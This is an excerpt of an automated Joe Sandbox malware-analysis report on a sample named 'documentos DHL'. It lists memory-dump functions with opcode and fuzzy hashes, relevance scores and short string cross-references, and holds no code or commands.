Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 537df671f0e8d08dbf32f4bdb2798da55360aa4128bac174194ec1365c580773
Instruction ID: 418f7d40be68adb024ce5142ac36de114bba9c3a208262b81d82ab1bacf505e9
Opcode Fuzzy Hash: 537df671f0e8d08dbf32f4bdb2798da55360aa4128bac174194ec1365c580773
Instruction Fuzzy Hash: 82B19C46E2B31998E3B3A030C5D17E36798DF171D2F258F5A8827F2DA17B1F4A8A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337207C Relevance: 6.7, Strings: 5, Instructions: 438COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 09854b1f3c82274260045383dc842c3c428a12b59864991901a6c159dc4e07d2
Instruction ID: 8423289a80f63084fa222a009271b83dbd734df5e360dacbec2e2ff6841dbafd
Opcode Fuzzy Hash: 09854b1f3c82274260045383dc842c3c428a12b59864991901a6c159dc4e07d2
Instruction Fuzzy Hash: 83A19D46E2B31998E3B3A030C1D27E36788DF175D2F258F1A8427F2DA17B1F4A8A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 03371FD4 Relevance: 6.7, Strings: 5, Instructions: 431COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 5471fb41faba982d3d34425b80baf8b1a30becde4e69e1ab38a1739ff622df4b
Instruction ID: bca1f2b5a83b117722b5039a0c5af58bf863bf7f6375c27b3a27861a0e1eff39
Opcode Fuzzy Hash: 5471fb41faba982d3d34425b80baf8b1a30becde4e69e1ab38a1739ff622df4b
Instruction Fuzzy Hash: AFB1AE46E2B31998E3B3A030C1D17E76798DF171D2F258F1A8827F2DA17B1F4A8A15D4

Uniqueness

Uniqueness Score: -1.00%

Function 03371E9D Relevance: 6.7, Strings: 5, Instructions: 430COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 5b45c385e82dc603598f3eb0f849040b844e35546c65ec6a6ed4e16687b2d832
Instruction ID: 4ad3c06a0a362789a0f110e4e9bf74baf5d7cb134f3cdde6dc62fde1859f92c3
Opcode Fuzzy Hash: 5b45c385e82dc603598f3eb0f849040b844e35546c65ec6a6ed4e16687b2d832
Instruction Fuzzy Hash: A2B18D46E2A31998E3A3A030C1927E36798DF171D2F258F568827F1DA17B1F4A8A15D4

Uniqueness

Uniqueness Score: -1.00%

Function 0337223F Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 698a42b5c9ca412c824d039486103b185c3abbeb475ca6d5108c4ba7bb39e021
Instruction ID: ecac7395916aada036ac2ef08c4509aa01052f399530b3c6620a7fdeb23d5fad
Opcode Fuzzy Hash: 698a42b5c9ca412c824d039486103b185c3abbeb475ca6d5108c4ba7bb39e021
Instruction Fuzzy Hash: 02A1BF46E2A31998E3B3B030C1D17E26798DF171D2F658F1A8867F2DA17B1F498A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033720EF Relevance: 6.6, Strings: 5, Instructions: 394COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 05e83001bacf353c939f3bdcb238e1bb236218e7ed9b38d0600d2a4045ad7cc1
Instruction ID: c506c70565313cfcbf1cd050ba68902ec071210dc160013486ff5bfe579a0afc
Opcode Fuzzy Hash: 05e83001bacf353c939f3bdcb238e1bb236218e7ed9b38d0600d2a4045ad7cc1
Instruction Fuzzy Hash: C7A18E46E2A31999E3B3A030C1D27E36798DF175D2F258F1A8427F1DA17B1F4A8A19C4

Uniqueness

Uniqueness Score: -1.00%

Function 033721DD Relevance: 6.6, Strings: 5, Instructions: 384COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
dB, xrefs: 03372306
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$dB$t${
API String ID: 0-4087330480
Opcode ID: 8a7c0cab9abcf04c8a58676327769a41626defe61d858b13660f4fb39b1adc90
Instruction ID: 939d703850a1fde7361d291744fa7ab573e09930942d42c75aee75c2422767c0
Opcode Fuzzy Hash: 8a7c0cab9abcf04c8a58676327769a41626defe61d858b13660f4fb39b1adc90
Instruction Fuzzy Hash: 00A1AD46E2A31999E3B3A030C1D17E36798DF171D2F258F1A8867F2DA17B1F498A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033724AE Relevance: 5.5, Strings: 4, Instructions: 454COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: ed86a441e30941d570eec6ba110914d4e045927e4aa0a44a506a3b114582a4de
Instruction ID: 747c84e06ab5fc5047c7dff6b80456a3800e1c7d6d6a39c7bfe822ffc46a7127
Opcode Fuzzy Hash: ed86a441e30941d570eec6ba110914d4e045927e4aa0a44a506a3b114582a4de
Instruction Fuzzy Hash: 00A18B46E1A30999DB73E029C1E17F3978CDF2A5F2F218F99C427E1D637A1E094A1584

Uniqueness

Uniqueness Score: -1.00%

Function 0337269D Relevance: 5.4, Strings: 4, Instructions: 432COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: fc83fc9bb573401c90992dae9bf3d88bd92383f4e41f24e787e73f2c8082b6cf
Instruction ID: af1fcc7c644c3dda8686542eab30a1c9c0f826a280cee400212af093bbc25d48
Opcode Fuzzy Hash: fc83fc9bb573401c90992dae9bf3d88bd92383f4e41f24e787e73f2c8082b6cf
Instruction Fuzzy Hash: F3A19A4AD3A38589DB73E038C7D17F352ACFF161A1F108F99E427E19927B1E094A5588

Uniqueness

Uniqueness Score: -1.00%

Function 03372446 Relevance: 5.4, Strings: 4, Instructions: 407COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: aafa88c97f364d21489ca057c986731e3e80e1497d8194506d90296757ff52eb
Instruction ID: 909ce0d055aacf6d01bf3a393029629bd1eeb5ea0c45113ac48fd960af0ea661
Opcode Fuzzy Hash: aafa88c97f364d21489ca057c986731e3e80e1497d8194506d90296757ff52eb
Instruction Fuzzy Hash: 4881A046E2B31998E3B3A030C1D27E36798DF171D2F658F1A8867F1DA17B1F498A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337236E Relevance: 5.4, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: ffa5786346dd4c8f858987819c9c87da3cca96cfa9c303aff4aec5a997099a2a
Instruction ID: 21534aeff164ecdab1ad8c51106f0aa7338efaa1b64d536d24063fec7b48a36e
Opcode Fuzzy Hash: ffa5786346dd4c8f858987819c9c87da3cca96cfa9c303aff4aec5a997099a2a
Instruction Fuzzy Hash: 0391BE46E2B31998E3B3B030C1D17E26788DF172D2F258F1A4467F2DA17B1F0A8A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033725C0 Relevance: 5.4, Strings: 4, Instructions: 401COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: d082846e5e7bd7a785d4a7841aa153b58fbc6e9dda906f211c04f2c1c764cef2
Instruction ID: 080c0fdffc47f6cc99359ac8dd639709028fe5d814f3426b5930727537f66c2d
Opcode Fuzzy Hash: d082846e5e7bd7a785d4a7841aa153b58fbc6e9dda906f211c04f2c1c764cef2
Instruction Fuzzy Hash: D771C046E2B31998E3B3A034C1D17E36788DF172D2F648F1A8867F1DA17B1F098A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033723CC Relevance: 5.4, Strings: 4, Instructions: 391COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 7ddd8486529ad9ff4f1d31a4070643b83efa625c1d510c1e8c8e18b1a02180b8
Instruction ID: b0562abb6ca3a66d249b1867b9aa359f9d9093766ca70c1c584bfe000c5fb6b8
Opcode Fuzzy Hash: 7ddd8486529ad9ff4f1d31a4070643b83efa625c1d510c1e8c8e18b1a02180b8
Instruction Fuzzy Hash: 6081A046E2B31998E3B3A030C1D17E36798DF171D2F658F1A8867F2DA17B1F098A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033722C0 Relevance: 5.4, Strings: 4, Instructions: 389COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 5ba234635fe78d0ea2bb463ff38f8f5535272a479b80879b208f2a658126278b
Instruction ID: af081d6d3f6d8b9bdd966e205d1aaf74394f0fbfb99e4c6540c87a69e0061a2c
Opcode Fuzzy Hash: 5ba234635fe78d0ea2bb463ff38f8f5535272a479b80879b208f2a658126278b
Instruction Fuzzy Hash: C691BE46E2B31998E3B3A030C1D17E76798DF171D2F258F1A8467F2DA17B1F498A19C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337231C Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: bc48ff1b9b595416c577be757885310d78be255d75934197533ff8d9629329a1
Instruction ID: e4f5b512992fa5a5497b9edc4bb095bb7d9e51df98ca3e808fd7a1407cbdc9ac
Opcode Fuzzy Hash: bc48ff1b9b595416c577be757885310d78be255d75934197533ff8d9629329a1
Instruction Fuzzy Hash: 2891AF46E2B31998E3B3A030C1D17E36798DF171D2F658F1A4467F1DA17B1F4A8A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337263F Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 9d23c2cb31456b4996f979f862034bdf28afc17fec57480262262035401d5ee3
Instruction ID: 645c3f53b2d1ecc8c8c6ad2a2983aa442042b30ca17d64cf4e5a8e4c407e72c6
Opcode Fuzzy Hash: 9d23c2cb31456b4996f979f862034bdf28afc17fec57480262262035401d5ee3
Instruction Fuzzy Hash: 7871C146E2B319D8D3B3A034C1D17E26798DF172D2F648F1A8867F2DA17B1F498A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372528 Relevance: 5.3, Strings: 4, Instructions: 319COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 9d010e1a1741edd221d990857d5b855fc22cb2df6adda9f4cd97bd3f41a08cbb
Instruction ID: eb62e23ccc47bcb0875a39660e88d068755a28523a6c0d714b22a8ae54e3ed08
Opcode Fuzzy Hash: 9d010e1a1741edd221d990857d5b855fc22cb2df6adda9f4cd97bd3f41a08cbb
Instruction Fuzzy Hash: 0A81AF46E2B31998D3B3A030C5D17E26788DF17292F658F164827F2DA17B1F498A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 033729A6 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: e5ad2e6e14013be1bec3f36b5444fe57ef7915368be8e59fe9285b7bae09aa6a
Instruction ID: 7b1659cbdc09daafc850be50091b76f336d3af75c5b4e00a131758a419d6e905
Opcode Fuzzy Hash: e5ad2e6e14013be1bec3f36b5444fe57ef7915368be8e59fe9285b7bae09aa6a
Instruction Fuzzy Hash: 4351C146E2B70999E3B3A034C1D27F31789DF172D1F648F1A8867A2D917F1F498916C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337293D Relevance: 5.3, Strings: 4, Instructions: 315COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 73b356b3610ec83b881ad42da7faaa0ea9bc337b06fb41f8b46762c2655abf4c
Instruction ID: 1b5f51d6d42e89abf70d54c0f2b8fc76d60edeaea36aa3712f7355f020aaf720
Opcode Fuzzy Hash: 73b356b3610ec83b881ad42da7faaa0ea9bc337b06fb41f8b46762c2655abf4c
Instruction Fuzzy Hash: 0F51BE46E2B30999E3B3A034C1D27F21798DF172E1F648F1A482BB2DA17B1F058916C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372719 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: ac80b1a86d61e7f11a81e2047e8110d7db6f117f8df4c3b7a599a1e8f88f76d7
Instruction ID: 240ecf0e3fd324a7a30e9fd03f0537a04c87139da0607dc610a9aa43ca8cf8ae
Opcode Fuzzy Hash: ac80b1a86d61e7f11a81e2047e8110d7db6f117f8df4c3b7a599a1e8f88f76d7
Instruction Fuzzy Hash: D071BF47E2B31998E3B3A034C1D17E26788DF172D2F648F194827F2DA17B1F498A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 033727F8 Relevance: 5.3, Strings: 4, Instructions: 300COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: c2dd84d51aa51af445544afd47f90fe5cf828840d53130bcda98e679ef7dbdda
Instruction ID: 5ee0d51e55166642bcb7671de52a7ffabfad264437c740c9439d4bc6483c6462
Opcode Fuzzy Hash: c2dd84d51aa51af445544afd47f90fe5cf828840d53130bcda98e679ef7dbdda
Instruction Fuzzy Hash: B861C246E2B30599E3B3A074C1D27F22789DF172D2F648F194867B1DA17B1F098A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 033728C7 Relevance: 5.3, Strings: 4, Instructions: 287COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 794f0558db3c5e4d067616ea5ce089b456ace620e34fee38b0f75bbc922cbb8a
Instruction ID: 9697b710ea9f347ac7c017a8284d5d2ed516eaac49dbabb05d7a195eb2f340b4
Opcode Fuzzy Hash: 794f0558db3c5e4d067616ea5ce089b456ace620e34fee38b0f75bbc922cbb8a
Instruction Fuzzy Hash: 4751CF46E1B30998E3B3A034C1D27F22799DF176E1F648F5A4867B2DA17B1F098A16C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372763 Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 67e513fe944380c7b9b111c86229a867ef424c518836573f808dbca1ed5d06bf
Instruction ID: 4c3c323bfd70ec25b3996b3d61508ad33fac6b19d4b8b1e14c46d43360cdd0be
Opcode Fuzzy Hash: 67e513fe944380c7b9b111c86229a867ef424c518836573f808dbca1ed5d06bf
Instruction Fuzzy Hash: D861D247E2B31598E3B3A034C1D17E26788DF172D2F658F2A4827F2D917B1F098A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 033727B7 Relevance: 5.3, Strings: 4, Instructions: 269COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: a2d8badca2bc374b6fa19c14e3dcf10f6aa5eb2d758e1b4962955f153cc2538f
Instruction ID: 5d6ba3be8148791338e57f10e03db69ab99ee368a485acdef6307dcf2b4dad8a
Opcode Fuzzy Hash: a2d8badca2bc374b6fa19c14e3dcf10f6aa5eb2d758e1b4962955f153cc2538f
Instruction Fuzzy Hash: 1561CF46E2B30999E3B3A030C1D27F32789DF172D2F648F1A4827B2DA17B1F098A15C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372C04 Relevance: 5.3, Strings: 4, Instructions: 268COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 1b9876d99ca0dada078708cfb83ffed8e5e2f1347161949f1153f84bdcd718d8
Instruction ID: 98dcb93a48cb5ab5c8169815d9cc3cbbe6b017fd3e030fb1e211b1fda27c323c
Opcode Fuzzy Hash: 1b9876d99ca0dada078708cfb83ffed8e5e2f1347161949f1153f84bdcd718d8
Instruction Fuzzy Hash: 0541C24AF2F70594E377A034C5D27F2178DDF072E1F648B168867A2DD57B1E058926C4

Uniqueness

Uniqueness Score: -1.00%

Function 033728A6 Relevance: 5.2, Strings: 4, Instructions: 246COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: e75aff478d8bfa672361cf9dce89fa3da2339d2dc3f00f37f18e8e6ef6b53ae4
Instruction ID: 331c1adfbcae50d92fd4749446b45e4e018dae46ed2db15f972c24a6ed97ce53
Opcode Fuzzy Hash: e75aff478d8bfa672361cf9dce89fa3da2339d2dc3f00f37f18e8e6ef6b53ae4
Instruction Fuzzy Hash: EC51B147E2B71995E3B3A034C1D27F21789DF172D1F648F19482BB2DA17B1F098915C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372CE3 Relevance: 5.2, Strings: 4, Instructions: 239COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: fc3c63f52ded46030ef230efc51c26581f488a4f3f5fbca2c959c1d575d5fd68
Instruction ID: fe6000efa1e405d3efded2b415874d8e17ccfce79fcc1cff0713afd8311153f7
Opcode Fuzzy Hash: fc3c63f52ded46030ef230efc51c26581f488a4f3f5fbca2c959c1d575d5fd68
Instruction Fuzzy Hash: EE41F44BE2B70595E377A034C1D27F22389DF022E1F648F168867A2D957F1E098916C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372A68 Relevance: 5.2, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 9494463914473f79ee8672bce4614a730532d7ec2bffcb660ca4b4aee0514903
Instruction ID: 36a3b841ffa6fe44e5e61036a66e6e850b118d05ec237ead6d005f9bd96b6c4a
Opcode Fuzzy Hash: 9494463914473f79ee8672bce4614a730532d7ec2bffcb660ca4b4aee0514903
Instruction Fuzzy Hash: FD51D14AE2B70995E377A034C5D27F21788DF172E1F248F1A8867B2DD17B0F058916C4

Uniqueness

Uniqueness Score: -1.00%

Function 033716F3 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
JUUU, xrefs: 033716F5
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$JUUU${
API String ID: 0-1228790463
Opcode ID: 7cfbc93961251d20bd4d10bbd94d2a533b2ca1bde277bceb954737bd978faac7
Instruction ID: 31b4b7c8650ef63c1b71061e5250b16b36042cb30648257c2b6bf9014384931b
Opcode Fuzzy Hash: 7cfbc93961251d20bd4d10bbd94d2a533b2ca1bde277bceb954737bd978faac7
Instruction Fuzzy Hash: 4A41BB4BE2E30A95E3B6A07485D23F223DDDF132A0F54872A4D67238D1F70E448E65C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372AE9 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 7214bf2e4c444d46827305cfa87b8376b9678e60d847fbb31431669002351bd0
